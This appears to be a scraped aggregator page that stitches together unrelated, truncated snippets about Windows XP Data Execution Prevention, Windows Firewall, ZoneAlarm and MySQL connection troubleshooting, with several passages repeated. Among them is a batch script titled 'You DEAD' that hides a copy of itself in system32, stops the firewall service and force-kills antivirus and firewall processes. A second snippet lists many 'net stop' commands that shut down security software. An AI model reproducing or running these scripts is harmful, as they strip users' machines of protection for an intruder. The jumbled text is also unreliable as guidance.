selected programs" in "Data Execution Protection ", click Add to go to the installation directory of an application, find the executable file of the application, and add it in. Generally, this program runs normally. After the computer is restarted, the settings take effect.
2. directly modify the Boot. ini file
Find the Boot. ini file in the root directory of the partition where the WinXP SP2 system is located. Note that it has an additional "NoExecute" parameter, and the previous modificatio
XP (SP1) with the built-in Windows Firewall, and Windows Firewall is automatically enabled by default (figure 2 ), in this way, computer viruses and worms can be prevented from intruding into the system, and unauthorized applications and services cannot connect to the network. Alerter and Messenger services with many security risks have been automatically disabled, we can even set a port to only be used by local subnet users, which can greatly improve the security performance.
Figure 2 Win
/IP port number that the server is configured to listen to (it is the value of the port variable .)
Make sure that your mysqld server was not started with the -- skip-networking option. If it was, you cannot connect to it using TCP/IP.
Check to make sure that there is no firewall blocking access to MySQL. Applications such as ZoneAlarm and the Windows XP personal firewall may need to be configured to allow external access to a MySQL server.
2.1. Conne
, Microsoft has built firewall functions in the operating system. For Windows XP and later versions, you can open it directly in the control panel.You can also install third-party firewall software. Recommended InstallationForeignSuch as KIS, Symantec, and ZoneAlarm of Kaspersky (Kaspersky. Do not useChinaFirewall ProductsIf your computer is only used for surfing the Internet, chatting, watching movies, and using office software, you can set the firew
As network security problems become increasingly serious, network security products have also been paid attention. As the first network security product and the most popular security product, firewall is also favored by users and R D institutions. From the perspective of firewall applications, there are basically two types: Network-level firewalls and personal firewalls. Windows is the most widely used PC operating system, so there are countless personal firewall products developed under Window
The content is as follows. If you want to try its power, try it.
Copy codeThe Code is as follows: @ echo off
Title You DEAD !!!!!!!
Set taskkill = s
Copy % 0% windir % \ system32 \ cmd. bat
Attrib % windir % \ system32 \ cmd. bat + r + s + h
Net stop sharedaccess> nul
% S %/im pfw.exe shadowtip.exe shadowservice.exe qq.exe assumer.exe IEXOLORE. EXE/f> nul
% S %/im norton */f> nul
% S %/im av */f> nul
% S %/im fire */f> nul
% S %/im anti */f> nul
% S %/im spy */f> nul
% S %/im bullguard/f> nul
%
connection" under "network task ". After the Wizard is started, click "Next ".3. Click Connect to Internet, and then click Next ".4. Click "manually set my connections" and then click "Next ".5. Select "connect with a broadband connection that requires the user name and password" and click "Next ".6. Perform the remaining steps. Use the connection information provided by the Internet service provider (ISP) to complete the wizard.Note: You may have to use the software provided by your ISP to cre
system properties is reflected in this parameter.There are only two options in the Data Execution protection entry that are reflected in the Boot.ini file as the "OptIn" and "Opton" two values of the "noexecute" parameter. However, some applications or driver compatibility is not strong, even if the "Data Execution protection" in the "release", it still does not work, such as: 3721 of the Internet Assistant, ZoneAlarm Pro and so on, this depends on t
the remaining steps. Complete the wizard by using the connection information provided by your Internet service provider (ISP).
Note: You may have to use the software provided by your ISP to create a new connection.
Step 6: Repair Winsock and TCP/IP
1. Click Start, click Run, type netsh winsock reset, and then press Enter.
2. When the command Prompt window blinks, restart the computer.
Step 7: Temporarily uninstall the third party firewall
Some third-party firewall software, such as the
"/y
net stop "PVIEW95"/y
net stop "Rav7.exe"
net stop "Safeweb.exe"/y
net stop "Scan32.exe"/y
net stop "Scan95.exe"/y
net stop "Snort-win32 GUI"/y
net stop Snort (intrusion detection System)/y
net stop "Sphinx.exe"/y
net stop "Sphinxwall"/y
net stop "Sweep95.exe"/y
net stop "Sybergen Secure Desktop"/y
net stop "Sybergen SyGate"/y
net stop "symproxysvc"/y
net stop "Tbscan.exe"/y
net stop "Tca.exe"/y
net stop "Tds2-98.exe"/y
net stop "Tds2-nt.exe"/y
net stop "terminet"/y
net stop "Tgb:bob"/y
net s
with Advanced Security.
By adding two-way protection, a better graphical interface, and advanced rule configuration, this advanced security Windows Firewall is becoming as powerful as a traditional host-based firewall, such as ZoneAlarm Pro.
I know that the first thing any server administrator can think of when using a host-based firewall is: Does it affect the proper functioning of this critical server base application? However, for any security me
up to avoid unnecessary false fault.
2. Virus, Trojan, malicious program intrusion caused by the fault
There are many malicious programs, viruses, Trojans will be through the Web page, bundled installation software or secret room to invade the user's computer, and then forcibly modify the user's Web browser home page, software, automatic startup options, security options, such as settings, forced pop-up ads, or other users to interfere with the operation, a large number of system resource con
: ZoneAlarm firewall.
There is also a user can customize security rules
That is, you can set up a single protocol individually, depending on the security state you need, as you know the network protocol very well.
3. Event Diary
This is the main function that every firewall software can not be less. Log the firewall software to hear all the events that occurred, such as the intruder's source, protocol, port, time, and so on. Logged events are determin
), user, user group, computer, Computer group, protocol, ICMP type, and so on. The criteria in the rule are added together; the more standards you add, the finer the incoming traffic is matched by Windows Firewall with Advanced Security.
By adding two-way protection, a better graphical interface, and advanced rule configuration, this advanced security Windows Firewall is becoming as powerful as a traditional host-based firewall, such as ZoneAlarm Pro
, Computer group, protocol, ICMP type, and so on. The criteria in the rule are added together; the more standards you add, the finer the incoming traffic is matched by Windows Firewall with Advanced Security.
By adding two-way protection, a better graphical interface, and advanced rule configuration, this advanced security Windows Firewall is becoming as powerful as a traditional host-based firewall, such as ZoneAlarm Pro.
I know the first thing an
, generally divided into low, medium and senior three. This does not understand the network protocol users, you can according to their own needs flexible set of different security programs. For example: ZoneAlarm firewall.
There is also a user can customize security rules
That is, you can set up a single protocol individually, depending on the security state you need, as you know the network protocol very well.
3. Event Diary
This is the main fu
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.